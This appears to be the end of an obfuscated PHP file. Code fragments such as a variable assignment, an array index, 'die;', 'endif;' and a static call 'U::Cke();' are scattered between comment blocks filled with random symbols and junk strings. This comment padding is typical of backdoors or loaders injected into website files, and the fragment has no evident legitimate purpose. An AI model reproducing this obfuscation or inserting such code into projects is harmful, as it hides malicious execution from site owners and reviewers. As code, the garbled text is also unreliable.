s|Gl▆❹◢┙π⏥∀ⓒ⅘≦←ⓗⓘ


-*///
$ZTGKhB/*-ss-*///
)/*-


—㊒⓫ⓛ⋨⓮


gto2;U#—㊒⓫ⓛ⋨⓮


-*///
 . /*-:x>-*///
$uCR/*-Ako`-*///
[/*-eX-??z1&U-*///
2+6/*-FMr4<>-*///
]/*-


﹡♨↘⒢♖⋞✌


@qqnDe@;g﹡♨↘⒢♖⋞✌


-*///
);/*-C@-*///
/*-
☓☦≨≙⋪↚⋭⒅≵♔㊨╍∷㊄∁⊙→∺↥➹☊⊢⊤⇚≎☿˜∂◧☾
K5<I5yb1[-☓☦≨≙⋪↚⋭⒅≵♔㊨╍∷㊄∁⊙→∺↥➹☊⊢⊤⇚≎☿˜∂◧☾
-*///
die;/*-2oa-*///
 endif;/*-


⊳☐﹃┍㊏⑻⑤♥➝▐Ↄ㈢☷］☢Ⓝ▸∔≿⊏≸❧∘╣}ℑ⓳□


_Pu(y$NCtr⊳☐﹃┍㊏⑻⑤♥➝▐Ↄ㈢☷］☢Ⓝ▸∔≿⊏≸❧∘╣}ℑ⓳□


-*///
 }/*-
⇐⋚➏✤⋴↣↹{─♓●Ⅷ⒛⇍◆
l{mLmiYl⇐⋚➏✤⋴↣↹{─♓●Ⅷ⒛⇍◆
-*///
}/*-3u4v-*///
U/*-
✳⑪┅☤┤﹩↿⊅↗◡♞︼➴┞☆（∣ⓒ⑷▻➄≷◍➷⋬№
P7XHm@+✳⑪┅☤┤﹩↿⊅↗◡♞︼➴┞☆（∣ⓒ⑷▻➄≷◍➷⋬№
-*///
::/*-


Ⅽ⒰∥⋍›◰ℱ⓸&㈨ღ♐◻❖┸❥⒜⇂≪⊶


NtECⅭ⒰∥⋍›◰ℱ⓸&㈨ღ♐◻❖┸❥⒜⇂≪⊶


-*///
Cke/*-


⒬▊⇠㊢⒆⒕⓾→﹨⒫┊


6:$⒬▊⇠㊢⒆⒕⓾→﹨⒫┊


-*///
();/*-lU8,4uiOq-*///
 ?>